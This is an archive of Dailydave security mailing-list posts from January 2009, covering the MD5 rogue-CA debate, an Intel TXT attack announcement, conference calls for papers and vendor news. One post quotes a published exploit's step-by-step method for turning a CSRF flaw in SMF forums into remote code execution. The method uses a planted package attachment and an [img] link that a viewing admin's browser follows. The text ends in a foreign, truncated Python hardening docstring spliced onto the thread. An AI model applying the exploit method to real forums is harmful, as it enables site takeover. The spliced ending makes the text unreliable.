From alex at sotirov.net Thu Jan 1 14:17:50 2009
From: alex at sotirov.net (Alexander Sotirov)
Date: Thu, 1 Jan 2009 14:17:50 -0500
Subject: [Dailydave] Questions about MD5+CA
In-Reply-To: <495A5DC2.5020204@immunityinc.com>
References: <495A5DC2.5020204@immunityinc.com>
Message-ID: <20090101191750.GA9837@MacBook.local>

On Tue, Dec 30, 2008 at 12:43:30PM -0500, Dave Aitel wrote:
> So if someone was able to get a root CA for $20000 - shouldn't we
> remove the RapidSSL root CA from our browsers with the next browser
> update? I don't see why people think this would be hard to replicate
> and hasn't been done previously to RapidSSL. Is it because no one
> other than that one team can do math or buy PS3s?
>
> Microsoft's advisory on this is essentially defaulting to the "No one
> else has ever done this" position. This is weird. Trusted Roots that
> could have been used to sign these things need to get re-issued,
> right? What am I missing here?

I agree. If revoking a root CA cert is so inconvenient or Internet-breaking that it can't be done even after an attack on the root has been demonstrated in practice, then our trust in the PKI system is perhaps misplaced.

If they don't revoke the root, the security of the PKI system from now until 2020 (when the RapidSSL cert expires) will rely on the assumption that our team did not make a second CA cert that nobody knows about and that nobody else did either. We didn't, but how can we possibly prove that? How can any CA that used MD5 prove beyond doubt that they have not signed a colliding key in the past?

The lesson here is that if you have a mechanism like CA root revocation, you need to regularly exercise it, otherwise you won't be ready to use it when the real need arises. Perhaps we need to start revoking one randomly selected root each year to get everybody used to the idea and ready to do it for real when there is a real threat.
We do drills and practice evacuating buildings for earthquakes and fires, so why not for online threats?

Alex

From alex at sotirov.net Thu Jan 1 16:00:29 2009
From: alex at sotirov.net (Alexander Sotirov)
Date: Thu, 1 Jan 2009 16:00:29 -0500
Subject: [Dailydave] MD5 Considered Harmful Today: Creating a rogue CA certificate
In-Reply-To: <3BC59F96-DFAA-43F9-80F7-624E4ABA3E76@securityevaluators.com>
References: <20081229150840.GA2808@MacBook.local> <20081230131618.GA11667@baltika> <20081230165235.GA7950@81-163-137-128.visitor.congress.ccc.de> <3BC59F96-DFAA-43F9-80F7-624E4ABA3E76@securityevaluators.com>
Message-ID: <20090101210029.GA10450@MacBook.local>

On Tue, Dec 30, 2008 at 12:51:01PM -0600, Charles Miller wrote:
> That's great, but it doesn't answer the question we really care
> about... who won the T-shirt?

I need to go through all my emails and tweets to find out who came closest. Stay tuned.

Alex

From dave at immunityinc.com Fri Jan 2 12:15:32 2009
From: dave at immunityinc.com (Dave Aitel)
Date: Fri, 02 Jan 2009 12:15:32 -0500
Subject: [Dailydave] Questions about MD5+CA
In-Reply-To: <20090101191750.GA9837@MacBook.local>
References: <495A5DC2.5020204@immunityinc.com> <20090101191750.GA9837@MacBook.local>
Message-ID: <495E4BB4.9080805@immunityinc.com>

Totally. This was a good opportunity for Mozilla or the IE team to be thought leaders in security, and neither stepped up.
The right thing to do would have been to announce an update that disabled the root CA in 10 days. That gives everyone ten days to get a new certificate from somewhere else. Security is about hard choices. Currently, we're all about sticking our heads in the sand - which devalues SSL as a security protocol entirely.

In my role as CTO at Immunity I try to do similar things: our newest researcher Skylar is learning about this the hard way when she calls up asking why her shiny new Dell laptop does not yet support wireless. :>

-dave

> I agree. If revoking a root CA cert is so inconvenient or
> Internet-breaking that it can't be done even after an attack on the
> root has been demonstrated in practice, then our trust in the PKI
> system is perhaps misplaced.
>
> If they don't revoke the root, the security of the PKI system from
> now until 2020 (when the RapidSSL cert expires) will rely on the
> assumption that our team did not make a second CA cert that nobody
> knows about and that nobody else did either. We didn't, but how can
> we possibly prove that? How can any CA that used MD5 prove beyond
> doubt that they have not signed a colliding key in the past?

From bas.alberts at immunityinc.com Fri Jan 2 12:17:36 2009
From: bas.alberts at immunityinc.com (Bas Alberts)
Date: Fri, 02 Jan 2009 12:17:36 -0500
Subject: [Dailydave] CVE-2008-5499, Linux Flash Player bug, unspecified no more
Message-ID: <495E4C30.2090805@immunityinc.com>

Hi list,

I recently did some work on the latest Linux Flash vulnerability, and found the results to be highly infotaining.
Read all about it at:

http://basonbugs.blogspot.com/2008/12/you-can-only-sit-down-if-you-are-human.html

Love,
Bas

From brouce at gmx.net Fri Jan 2 20:47:40 2009
From: brouce at gmx.net (wishi)
Date: Sat, 03 Jan 2009 02:47:40 +0100
Subject: [Dailydave] Questions about MD5+CA
In-Reply-To: <495E4BB4.9080805@immunityinc.com>
References: <495A5DC2.5020204@immunityinc.com> <20090101191750.GA9837@MacBook.local> <495E4BB4.9080805@immunityinc.com>
Message-ID: <495EC3BC.4060108@gmx.net>

Dave Aitel wrote:
> Totally. This was a good opportunity for Mozilla or the IE team to be
> thought leaders in security, and neither stepped up. The right thing
> to do would have been to announce an update that disabled the root CA
> in 10 days. That gives everyone ten days to get a new certificate from
> somewhere else. Security is about hard choices. Currently, we're all
> about sticking our heads in the sand - which devalues SSL as a
> security protocol entirely.
>
> In my role as CTO at Immunity I try to do similar things: our newest
> researcher Skylar is learning about this the hard way when she calls
> up asking why her shiny new Dell laptop does not yet support wireless. :>
>
> -dave
>
>> I agree. If revoking a root CA cert is so inconvenient or
>> Internet-breaking that it can't be done even after an attack on the
>> root has been demonstrated in practice, then our trust in the PKI
>> system is perhaps misplaced.
>
>> If they don't revoke the root, the security of the PKI system from
>> now until 2020 (when the RapidSSL cert expires) will rely on the
>> assumption that our team did not make a second CA cert that nobody
>> knows about and that nobody else did either. We didn't, but how can
>> we possibly prove that?
>> How can any CA that used MD5 prove beyond
>> doubt that they have not signed a colliding key in the past?
>

http://www.cs.cmu.edu/~perspectives/index.html

Just found that worth mentioning. Anyhow this neither solves the problem, nor affects it directly: Security is a business. It's _just_ about money; in the end. Management doesn't care about security, or an engineering perspective. Especially this case showed that an academic paper from 2007 has been ignored until someone bought 200 playstations and built a cluster, implemented the theory, and made it.

RapidSSL had no Defense In Depth like "random" numbers, or credential checks. But I guess they effectively - because of this - made a lot of money. They kept the inventions very low. Obviously too low. The PKI CA chain of trust weakened for profit interests. Other CAs have better (more expensive) implementations - they invested in security. But the weakest chain - that's what it is all about.

Security is about choices. For sure. About the choice to maximize profit at all costs, or not. That brings me back to "Perspectives" - the firefox add on. I personally don't trust CAs, or huge PKIs. Latter always get weaker, the larger they grow. And CAs are an economy of strangely named companies that no one transparently monitors.

It's interesting: in theory PKIs work very well, as long as there's no money. ;)

wishi

From jon at oberheide.org Sat Jan 3 04:44:15 2009
From: jon at oberheide.org (Jon Oberheide)
Date: Sat, 03 Jan 2009 04:44:15 -0500
Subject: [Dailydave] Questions about MD5+CA
In-Reply-To: <495EC3BC.4060108@gmx.net>
References: <495A5DC2.5020204@immunityinc.com> <20090101191750.GA9837@MacBook.local> <495E4BB4.9080805@immunityinc.com> <495EC3BC.4060108@gmx.net>
Message-ID: <1230975855.14889.26.camel@localhost>

On Sat, 2009-01-03 at 02:47 +0100, wishi wrote:
> Dave Aitel wrote:
> > Totally. This was a good opportunity for Mozilla or the IE team to be
> > thought leaders in security, and neither stepped up.
> > The right thing
> > to do would have been to announce an update that disabled the root CA
> > in 10 days. That gives everyone ten days to get a new certificate from
> > somewhere else. Security is about hard choices. Currently, we're all
> > about sticking our heads in the sand - which devalues SSL as a
> > security protocol entirely.

[snip]

> >> If they don't revoke the root, the security of the PKI system from
> >> now until 2020 (when the RapidSSL cert expires) will rely on the
> >> assumption that our team did not make a second CA cert that nobody
> >> knows about and that nobody else did either. We didn't, but how can
> >> we possibly prove that? How can any CA that used MD5 prove beyond
> >> doubt that they have not signed a colliding key in the past?
> >

[snip]

> Security is about choices. For sure. About the choice to maximize profit
> at all costs, or not. That brings me back to "Perspectives" - the
> firefox add on. I personally don't trust CAs, or huge PKIs. Latter
> always get weaker, the larger they grow. And CAs are an economy of
> strangely named companies that no one transparently monitors.
>
> It's interesting: in theory PKIs work very well, as long as there's no
> money. ;)

On the other hand, I'd argue that PKIs are more effective when there _is_ money involved. While CAs will of course attempt to maximize profits, any commercial root CA included in popular browsers has a significant economic incentive to maintain its trust and reputation. Without revocation of the offending root CAs by browser vendors, it is sending a message that poor security practices will not be punished. Responsible (and justified, in this case) revocation is the only way to ensure that economic incentives continue to exist (e.g. "Revocation costs us X dollars so we need to invest Y dollars to ensure our compliance") to improve the security practices of these CAs.
Regards,
Jon Oberheide

--
Jon Oberheide
GnuPG Key: 1024D/F47C17FE
Fingerprint: B716 DA66 8173 6EDD 28F6 F184 5842 1C89 F47C 17FE

From valsmith at attackresearch.com Sat Jan 3 22:42:11 2009
From: valsmith at attackresearch.com (val smith)
Date: Sat, 3 Jan 2009 20:42:11 -0700
Subject: [Dailydave] Announcing Attack Research
Message-ID: 

Hey all,

About three years ago over the holidays I announced first on this list the creation of a malware research site. Now, three years later, again over the holidays, I've moved on, am no longer a part of that effort, and would like to announce the creation of a new project: http://www.attackresearch.com. The part you'll be most interested in probably is http://blog.attackresearch.com/.

The basic idea is a community site where people can post technical details about different types of attacks. Think of it as a hacker how-to mixed with incident response case studies blog where anyone can post. I've kicked it off with a few posts that I hope you'll find interesting and that may give you some ideas of what I'm aiming for.

Happy 07D9 and I hope to see some of you at one of the cons this year!

V.

From joanna at invisiblethingslab.com Mon Jan 5 11:33:49 2009
From: joanna at invisiblethingslab.com (Joanna Rutkowska)
Date: Mon, 05 Jan 2009 17:33:49 +0100
Subject: [Dailydave] Attacking Intel(R) Trusted Execution Technology
Message-ID: <4962366D.6020102@invisiblethingslab.com>

Hello DD,

No longer than just a few weeks ago there was a discussion here at DD about Trusted Computing, TPM, TXT, etc [1], and even myself couldn't refrain from taking part in it.
Back then I was not at liberty to disclose any details of the then-ongoing research on TXT security that Rafal and I were involved in. I'm happy now to add my 2 cents to the discussion with the following post:

http://theinvisiblethings.blogspot.com/2009/01/attacking-intel-trusted-execution.html

Happy New Year!

joanna.

--
Joanna Rutkowska
Founder/CEO
Invisible Things Lab
http://invisiblethingslab.com/

[1] http://lists.immunitysec.com/pipermail/dailydave/2008-November/005427.html

From dave.aitel at gmail.com Mon Jan 5 22:10:00 2009
From: dave.aitel at gmail.com (Dave Aitel)
Date: Mon, 5 Jan 2009 22:10:00 -0500
Subject: [Dailydave] Attacking Intel(R) Trusted Execution Technology
In-Reply-To: <4962366D.6020102@invisiblethingslab.com>
References: <4962366D.6020102@invisiblethingslab.com>
Message-ID: 

So there's a way to bypass TXT and it involves an implementation error and a design error? This list is for lions - did I miss the meat?

-dave

On Mon, Jan 5, 2009 at 11:33 AM, Joanna Rutkowska wrote:
> Hello DD,
>
> No longer than just a few weeks ago there was a discussion here at DD about
> Trusted Computing, TPM, TXT, etc [1], and even myself couldn't refrain from
> taking part in it.
>
> Back then I was not at liberty to disclose any details of the then-ongoing
> research on TXT security that Rafal and I were involved in. I'm happy now to add
> my 2 cents to the discussion with the following post:
>
> http://theinvisiblethings.blogspot.com/2009/01/attacking-intel-trusted-execution.html
>
> Happy New Year!
>
> joanna.
>
> --
> Joanna Rutkowska
> Founder/CEO
> Invisible Things Lab
> http://invisiblethingslab.com/
>
>
> [1] http://lists.immunitysec.com/pipermail/dailydave/2008-November/005427.html
>

From joanna at invisiblethingslab.com Tue Jan 6 04:34:48 2009
From: joanna at invisiblethingslab.com (Joanna Rutkowska)
Date: Tue, 06 Jan 2009 10:34:48 +0100
Subject: [Dailydave] Attacking Intel(R) Trusted Execution Technology
In-Reply-To: 
References: <4962366D.6020102@invisiblethingslab.com>
Message-ID: <496325B8.2050306@invisiblethingslab.com>

Hi Lion,

Dave Aitel wrote:
> So there's a way to bypass TXT and it involves an implementation error
> and a design error? This list is for lions

Hoho ;)

> - did I miss the meat?
>

The meat is in DC, the very next month. As it is customary these days, you're free to speculate on how each stage of the attacks might work, but, of course, we won't provide any comments on this until our BH presentation.

Cheers,
joanna.

> -dave
>
>
> On Mon, Jan 5, 2009 at 11:33 AM, Joanna Rutkowska
> wrote:
>> Hello DD,
>>
>> No longer than just a few weeks ago there was a discussion here at DD about
>> Trusted Computing, TPM, TXT, etc [1], and even myself couldn't refrain from
>> taking part in it.
>>
>> Back then I was not at liberty to disclose any details of the then-ongoing
>> research on TXT security that Rafal and I were involved in. I'm happy now to add
>> my 2 cents to the discussion with the following post:
>>
>> http://theinvisiblethings.blogspot.com/2009/01/attacking-intel-trusted-execution.html
>>
>> Happy New Year!
>>
>> joanna.
>>
>> --
>> Joanna Rutkowska
>> Founder/CEO
>> Invisible Things Lab
>> http://invisiblethingslab.com/
>>
>>
>> [1] http://lists.immunitysec.com/pipermail/dailydave/2008-November/005427.html
>>

From aoz.syn at gmail.com Tue Jan 6 11:00:03 2009
From: aoz.syn at gmail.com (RB)
Date: Tue, 6 Jan 2009 09:00:03 -0700
Subject: [Dailydave] Attacking Intel(R) Trusted Execution Technology
In-Reply-To: <496325B8.2050306@invisiblethingslab.com>
References: <4962366D.6020102@invisiblethingslab.com> <496325B8.2050306@invisiblethingslab.com>
Message-ID: <4255c2570901060800j32c5f541ifd1f121843dc7f92@mail.gmail.com>

On Tue, Jan 6, 2009 at 02:34, Joanna Rutkowska wrote:
> The meat is in DC, the very next month. As it is customary these days, you're
> free to speculate on how each stage of the attacks might work, but, of course,
> we won't provide any comments on this until our BH presentation.

Thisjustin: Do current security theater^Wresearch practices involve nearly as much PR as actual work? Have previously meaningful discussion lists devolved to simple broadcast media for the profiteer? Find out at my next $1200/head media circus!

From dave at immunityinc.com Thu Jan 8 11:48:35 2009
From: dave at immunityinc.com (Dave Aitel)
Date: Thu, 08 Jan 2009 11:48:35 -0500
Subject: [Dailydave] Hot and Cold. In and Out. And other Katy Perry Lyrics
Message-ID: <49662E63.7080102@immunityinc.com>

For those of you who are not aware, Immunity, DSquare, and Tenable have partnered up:
http://finance.yahoo.com/news/Tenable-Announces-Partnership-bw-13990883.html

Likewise, there's a new awesome VOIP Assessment tool pack that plugs into CANVAS:
Video: http://www.vimeo.com/2465093
Link: http://www.immunityinc.com/products-enablesecurity.shtml

and CANVAS Customers get free entry to uCon, in Recife Brazil!
http://forum.immunityinc.com/index.php?topic=290.msg901#msg901

There's lots of good stuff on the Immunity forum lately. Even I posted on our new IP fingerprinting modules!
http://forum.immunityinc.com/index.php?topic=282.0

One thing on my mind always is that everyone's software is different. There's no generalization in this business. If you're attacking lawyers, you're looking at the special software they use to do courtroom presentations. If you're attacking doctors, it's the TIFF parser that reads MRI results. If you're attacking hackers, it's cross site scripting in their SILICA devices. Likewise with vulnerability scanners. If you're scanning your internal enterprise with a web-enabled CANVAS (coming soon!) then it's important to have an exploit feed that takes the particulars of your business into account. It's important for it to be customized to YOU, and not the world at large.
-dave

From snagg at sikurezza.org Wed Jan 7 06:58:54 2009
From: snagg at sikurezza.org (snagg)
Date: Wed, 7 Jan 2009 12:58:54 +0100
Subject: [Dailydave] Call for papers and trainers - SeacureIT 2009
Message-ID: <9BF0F700-D1E5-451F-AA80-01ACACDEEBB6@sikurezza.org>

Dear colleagues,

it is my pleasure to officially announce the launch of SEaCURE.IT, the first international technical conference ever held in Italy on security related topics. The 2009 edition will be held from May 19th to 22nd in the wonderful seaside resort Tanka Village, located in Villasimius, Sardinia, a large and beautiful island in the Mediterranean sea.

Besides the main conference, featuring two tracks of top-notch presentations over two intense days, the programme will include two days of advanced trainings, and a set of unique social events (Italian style), in order to foster networking. A number of key speakers already confirmed their presence, and we warmly thank them for the trust placed in us.

With this call for papers, we invite submission of papers from researchers worldwide for presentation at our conference.

== About SEaCURE.it ==

SEaCURE.IT is the first international technical conference ever held in Italy on security related topics, aimed at bringing together the leading experts from all over the world, to create a unique setting for networking and discussion among the speakers and the attendees. The 2009 edition will be held from May 19th to 22nd in the wonderful seaside resort Tanka Village, located in Villasimius. In a relaxed setting, our attendees and speakers will be able to meet and discuss in an informal, highly profitable way.

Besides the main conference, featuring two tracks of top-notch presentations over two intense days, the programme includes two days of advanced trainings, and a set of unique social events (Italian style), in order to foster networking.

SeacureIT is a non-vendor biased conference, strongly believing that it is possible to put together the brightest minds from the university, government, industry and hacking community to provide the audience with cutting-edge research in the field.

Target Audience: Security Officers, Security Professionals and Product Vendors, IT Decision Makers, Policy Makers, Security-, Network-, and Firewall-Admins, and Software Developers.

== Speakers/Trainers ==

Until February 10th, 23:59 CET, we'll be accepting speech proposals. Please note we are a non-product, non-vendor biased security conference, and do not accept vendor pitches. Any talk evidently aimed at selling products or services will be rejected without consideration. We look for novel research and contributions in the fields of computer, network and information security. Please, submit your idea to us: we will carefully evaluate it. We will also evaluate proposals for 2-days technical trainings on the same topics.

We offer the following speaker privileges:

* One economy class return-ticket to Cagliari for each accepted presentation.
* 3 nights of accommodation in the Conference Hotel.
* Meals for the speakers, and speaker activities during, before, and after the conference.
* A comprehensive program of activities for non-geek partners :)
* Speaker party

We offer the following trainer privileges:

* 50% of the net profit of the class
* 3 nights of accommodation in the Conference Hotel
* Meals during the days of the training
* Free access to the Conference
* Participation in speaker activities

== Topics ==

We are interested in bleeding edge security research, directly from leading researchers, professionals in academics, industry, and government, and the underground security community. Topics of special interest include, but are not limited to:

* Vista, Linux, OSX Security
* E/I-Voting Case-Studies, Attacks, Weaknesses
* Mobile Security
* Network Protocol Analysis
* AJAX/Web2.0/Javascript Security
* Secure Software Development
* VoIP
* Perimeter Defense / Firewall Technology
* Digital Forensics
* WLAN/WiFi, GPRS, IPv6 and 3G Security
* IPv6
* Smart Card Security
* Cryptography
* Intrusion Detection
* Incident Response
* Rootkit Detection, Techniques, and Defense
* Security Properties of Web-Frameworks
* Malicious Code Analysis
* Secure Framework Design
* .Net and Java Security

== Submissions ==

Please send your submission to cfp at seacure.it with the following information IN PLAIN TEXT in your email:

1. Presenter name and affiliation
2. Country and city of origin for your travel to the conference, as well as nationality/passport for visa requirements
4. contact information (e-mail address and a landline phone if possible)
5. SHORT biography, and a list of SELECTED publications and papers
6. Proposed paper title / proposed training title
7. Proposed paper abstract / proposed training outline
8. Three key reasons why you want to speak at SEaCURE.IT and why we would want you to speak :)
9. Optionally, any samples of prepared material or outlines (for this, a pdf attachment is acceptable)
10. Please list any other publications or conferences where this material has been or will be published/submitted. Concurrent submission is not a reason for rejection, while un-announced multiple submissions will make you look considerably bad ;-)

This last point also applies for the trainings, please let us know how many times the training has been delivered and where.

Regards,
Vincenzo Iozzo

From info at shakacon.org Fri Jan 9 03:34:49 2009
From: info at shakacon.org (Shakacon)
Date: Thu, 8 Jan 2009 22:34:49 -1000
Subject: [Dailydave] ShakaCon 2009 Call for Papers and Trainers
Message-ID: <0DAB602EAD833D44B10F51A28F258A11E74DAA@helix1.secure-dna.com>

[Shakacon ASCII-art banner, v3.0]

------------------------------------------
Shakacon III
"Sun, Surf, and C Shells"
CALL FOR PAPERS
www.shakacon.org\2009CFP.html
------------------------------------------

Who: Shakacon Crew
What: Shakacon III
When: June 11 - 12 2009
Where: Paradise (Honolulu, HI - Hawaii Convention Center)
Why: Why NOT?
How: By plane, boat, canoe, yacht, hydrofoil, stand-up paddle board, jet ski, long board, dolphin, whale sled, nuclear submarine, etc.

[Overview]

Sitting around somewhere freezing your a$$ off? Dreaming about warm days, rainbows, decadent tropical drinks sipped out of coconuts? Sure you could drop your 0day in Vegas, bring down the Internet in Germany, or satisfy your dark desires in Asia but we think you should submit your research or topics to our CFP and maybe win yourself a paid trip to Hawaii.

The Shakacon security conference is a laid back conference where industry, government, academia and independent experts will get together to share knowledge and experience in one of the most beautiful places on Earth. Shakacon will offer local, national, and international participants a casual, social, learning environment designed to present a "holistic" security view and the opportunity to network with peers and fellow enthusiasts in a relaxed setting. Leave your ego at the airport (or shoreline if you come in via another method) as we look forward to attendees varying in skill level from N00b to Ninja.

During the day, sessions will include: best practices, case studies, research projects, etc. covering all different aspects of the information security landscape.
There will be something for everyone and if sitting through talks isn't your cup of kava, there will be exciting events and contests for you to sharpen your skills and knowledge on. [Trainer Opportunities] Don't want to speak at the Con but have an uncanny ability to teach and a proven track record for delivering quality courseware and want to come to Hawaii? We're also interested in bringing in trainers to provide world class training leading up to ShakaCon (June 8, 9, 10). Submit a synopsis/class agenda, prior teaching experience, and maybe get selected to teach in Hawaii. [CFP Details] (1) Abstract for papers must be submitted to the review committee by _February 15th, 2009_. (2) Selection notification will occur by _February 27th, 2009_ and abstracts posted to the site on _March 1, 2009_. (3) Slides for your papers must be submitted by _April 15, 2009_. There are only a limited number of speaking sessions for which the conference organizers will provide travel and accommodations. Speaking slots should be generally limited to 1 hour; however we will accept "turbo" talk submissions and if we have enough we'll blend them into a block of the conference. The audience will be a broad mix of professional, academic, and enthusiast, so we welcome both technical and non-technical submissions on all aspects of security. The key criteria are practicality and timeliness. We want to provide our attendees with up to date materials they can take away and immediately gain benefit from as well as new research or tools. Absolutely NO SALES presentations will be accepted - our attendees don't show up to hear people talk about what you can sell them or why they need your services - or how your new anti0daySaaSuberfuzzymagadget will solve all their security woes. Proposals should include: "Shakacon CFP Submission: , " 1. Name, address, and contact info. 2. Employer and/or affiliations. 3. Brief biography. 4. Presentation experience. 5. Topic summary. 6. 
Reason this topic should be considered. 7. Other publications or conferences where this material has been or will be published/submitted. Please include plain text of all information provided in the body of your email as well as any file attachments. The plain text information will be reviewed first to find the most suitable candidates. Please forward the above information to info at shakacon.org in order to be considered. More conference information, registration details, and travel partner deals will be posted to: http://www.shakacon.org Follow Status on: www.twitter.com/shakacon ALOHA FROM THE SHAKACON CREW! This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. E-mail transmission cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain viruses. The sender therefore does not accept liability for any errors or omissions in the contents of this message, which arise as a result of e-mail transmission. If verification is required please request a hard-copy version. -------------- next part -------------- An HTML attachment was scrubbed... 
From valsmith at attackresearch.com Mon Jan 12 16:13:27 2009 From: valsmith at attackresearch.com (val smith) Date: Mon, 12 Jan 2009 14:13:27 -0700 Subject: [Dailydave] Attacking Intel(R) Trusted Execution Technology In-Reply-To: <4255c2570901060800j32c5f541ifd1f121843dc7f92@mail.gmail.com> References: <4962366D.6020102@invisiblethingslab.com> <496325B8.2050306@invisiblethingslab.com> <4255c2570901060800j32c5f541ifd1f121843dc7f92@mail.gmail.com> Message-ID: Heh, that's a good point. I'll tell you what, (not that I ever speak about anything so interesting or controversial as most of you) but if there's no imminent lawsuit, I'll post all the details about whatever talk I'm going to give on my website before whatever conference. Then hopefully even though you'll know what I'm going to say, you'll still come see me for my good looks at least :) V. On Tue, Jan 6, 2009 at 9:00 AM, RB wrote: > On Tue, Jan 6, 2009 at 02:34, Joanna Rutkowska > wrote: >> The meat is in DC, the very next month. As it is customary these days, you're >> free to speculate on how each stage of the attacks might work, but, of course, >> we won't provide any comments on this until our BH presentation. > > Thisjustin: Do current security theater^Wresearch practices involve > nearly as much PR as actual work? Have previously meaningful > discussion lists devolved to simple broadcast media for the profiteer? > Find out at my next $1200/head media circus!
From crioux at noctem.org Mon Jan 12 14:38:17 2009 From: crioux at noctem.org (Christien Rioux) Date: Mon, 12 Jan 2009 14:38:17 -0500 Subject: [Dailydave] SOURCE Boston Schedule Message-ID: <5680af290901121138k52b036b7g78f8157eb40f98a7@mail.gmail.com> SOURCE Conference is excited to announce the SOURCE Boston 2009 schedule and speaker line-up! SOURCE Boston March 9-10 (training) March 11-13 (conference) www.sourceconference.com Visit this URL to view the session schedule: http://www.sourceconference.com/index.php/source-boston-2009/boston-2009-sessions * Over 45 sessions and 50 speakers that have been hand selected by our board of expert advisors. * Learn how Microsoft Fixes Security Vulnerabilities. * Hear how Joe Grand, co-host of the hit show "Prototype This," explains complicated techniques and technologies in a way that millions of viewers could understand. * Introducing Heyoka: a new DNS Tunneling tool. * Learn and discuss the impact of Cloud Computing on the security industry. * Debate issues of disclosure with Dino Dai Zovi, Dan Kaminsky, Alex Sotirov, Katie Moussouris, and Ivan Arce, as Ryan Naraine moderates what is sure to be a controversial and riveting panel discussion. * Discuss the current economy and the effect it will have on the future of the security industry. * Participate in peer discussion groups and gain insight into the areas of security that are of interest to you. * Network with other security professionals and executives in an intimate and manageable environment. * Influence the evolution of the security industry. We hope you join us for what is sure to be THE EVENT of the year. Thanks, Stacy Thayer, Ph.D.
Christien Rioux SOURCE Conference From dave at immunityinc.com Tue Jan 13 12:24:38 2009 From: dave at immunityinc.com (Dave Aitel) Date: Tue, 13 Jan 2009 12:24:38 -0500 Subject: [Dailydave] It's Microsoft Tuesday! Message-ID: <496CCE56.8030106@immunityinc.com> Are you excited? I know we are! :> Downstairs an Unethical Hacking Class is going on and they're just about ready to take on a nice stack overflow, which is what I assume it is! It's CRITICAL! ALERT ALERT! :> http://forum.immunityinc.com/index.php?topic=301.0 -dave From kgconference at gmail.com Wed Jan 14 04:00:34 2009 From: kgconference at gmail.com (k g) Date: Wed, 14 Jan 2009 11:00:34 +0200 Subject: [Dailydave] Call for Papers: Cyber Warfare Message-ID: ----- Call for Papers! Conference on Cyber Warfare June 17-19, 2009 Tallinn, Estonia The Cooperative Cyber Defence Centre of Excellence is hosting a Conference on Cyber Warfare in 2009. CCD CoE is soliciting research papers within the emerging field of cyber warfare, including but not limited to the following topics: # Concepts and Doctrine # Technical Challenges and Solutions # Strategic Analysis # Cooperative Cyber Defence # Lessons Learned # Proofs of Concept # The Future The Selection Committee seeks submissions from academia and the professional world that offer an original and substantial contribution toward understanding conflict in cyberspace. Authors should send a one-page abstract to cfp at ccdcoe.org between January 1 and March 15, 2009. The Selection Committee will notify all authors of its decisions ASAP following submission but NLT April 1. Final papers are due May 15, 2009.
They will be presented at the conference by the author and published in the conference proceedings. Keynote Speakers include: James Lewis (CSIS) "Securing Cyberspace for the 44th Presidency" Mikko Hypponen (F-Secure) Chief Research Officer Conference registration information will be posted by February 1 at www.ccdcoe.org. Questions regarding this conference may be sent to cwcon at ccdcoe.org from January 1, 2009. Conference Manager: Kenneth Geers, CCD CoE Scientist ----- From ceh.wannabe at gmail.com Sat Jan 17 04:19:33 2009 From: ceh.wannabe at gmail.com (Simple Harris) Date: Sat, 17 Jan 2009 14:49:33 +0530 Subject: [Dailydave] No speculations about MS09-001? Message-ID: <8b5663e30901170119m616b37c3p9df567b5ce23fcd9@mail.gmail.com> Hi Lions, I was really expecting some nice humorous speculations about at least some of the bugs fixed in MS09-001, but so far it's so disappointing. Isn't there any nice newbie friendly technique for exploiting a memset(ptr, 0, 24); in the kernel especially when the memory pool is so crowded? -- Simple Harris, wannabe-{GIAC GSE, CISSP-ISSEP, CISA, CEH} From dave at immunityinc.com Mon Jan 19 13:08:07 2009 From: dave at immunityinc.com (Dave Aitel) Date: Mon, 19 Jan 2009 13:08:07 -0500 Subject: [Dailydave] CSRF :> Message-ID: <4974C187.1080401@immunityinc.com> People are always like "Whatever" to CSRF. For some engagements, we're still working on the XSS bugs to get that kind of learnin' to our clients. But for an example of a truly excellent CSRF bug - one that gets a remote shell, check out this exploit... From: http://www.milw0rm.com/exploits/6993. How awesome is that exploit? I mention it just because someone tried it on forum.immunityinc.com today. :> -dave ...
# I - Session Code
#
# The SMF administration panel is secured by a "session code", a kind of
# password that must be provided by the admin's browser when the admin
# is editing data.
#
# But the session code is not required for SMF package installation.
# Just to be clear: you don't need the "session code" to install the
# package, but you do need a valid admin session.
#
# II - Package Installation
#
# Package installation works this way:
# - The admin points SMF to an archive file, which can be either gzip or zip.
# - SMF un(g)zips it and analyses the XML files (yes, it works with XML)
#   to add, replace or remove code from any SMF source code file.
#
# To specify an archive to SMF, the admin is supposed to go to this URL:
#
# http://[website]/SMF/index.php?action=packages;sa=install2;package=[filename] (1)
#
# Since $_REQUEST['package'] is not checked, we can install any file
# on the server, even if the file is not in the Packages/ dir.
#
# Using CSRF, we can make an admin install whatever package we want.
# That does not seem really interesting for now, but be patient =)
#
# III - File upload in SMF; Attachments
#
# SMF lets users upload files in two cases:
# - You can upload an image to be your avatar
# - You can upload attachments to every post you submit
#
# Since uploaded images are checked, they don't interest us for now.
#
# Attachments are not checked by SMF.
# They are renamed and moved to the attachments/ directory.
# They are renamed this way:
# [id]_[name]_[ext][md5([name].[ext])]
#
# As you can see, there is no rand(), or other strange stuff:
# we can easily find the attachment name.
#
# The second part is more interesting now, no?
#
# Now, we can submit a post with a gzip'ed attachment, and make the admin
# click on a specific link, to install a package we uploaded ourselves.
#
# I wrote "click", so many of you may say "brr, that sucks".
# So here comes the wait-I've-not-finished part.
#
# IV - Wait-I've-not-finished part
#
# SMF allows us to display remote images in our posts, using [img][/img]
# We can just set our image URL to ... (1): when the admin sees our post,
# the package will be installed.
#
# V - Classic Scenario
#
# 1. We submit a fantastic post containing our nasty-attached-gzip'ed package, ready
#    to be installed.
# 2. We guess the attachment name; that's pretty easy because we can retrieve the
#    attachment ID.
# 3. We modify our post, adding an [img](1)[/img], replacing [filename] by
#    ../attachments/[the_name_you_just_found]
# 4. The administrator discovers our fantastic post on his fantastic forum ...
# 5. His browser discovers our image: it goes to the specified url to download it.
#    wooops. The package is installed.
#
# VI - Exploit
#
# The exploit will login with your user account, and submit a new post/topic containing an
# attachment, a gzipped package, which permits remote code execution once installed.
# Then it will obtain the attachment ID, determine the attachment name, and modify your topic to
# add a remote image (using [img][/img]).
# Then you'll have to wait for an admin to see your post ... and the package will be installed.
#
# VII - Notes
#
# - Do not forget to change the SUBJECT and MESSAGE constants, to make your post a little more realistic.
# - The current gzipped package is supposed to put PHP code at the end of the Settings.php file.
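The three checks whose absence sections I to V above rely on (a session code that an [img] fetch cannot carry, POST-only state changes, and a package path confined to Packages/), modelled as an added Python example; this is not SMF's code, and every name in it is hypothetical.

```python
"""Hardened authorization for a forum package-install action.

Added example (not SMF's own code): it models the three checks whose
absence the exploit notes above rely on. All names are hypothetical.
  1. the action needs the admin "session code" (a CSRF token), so an
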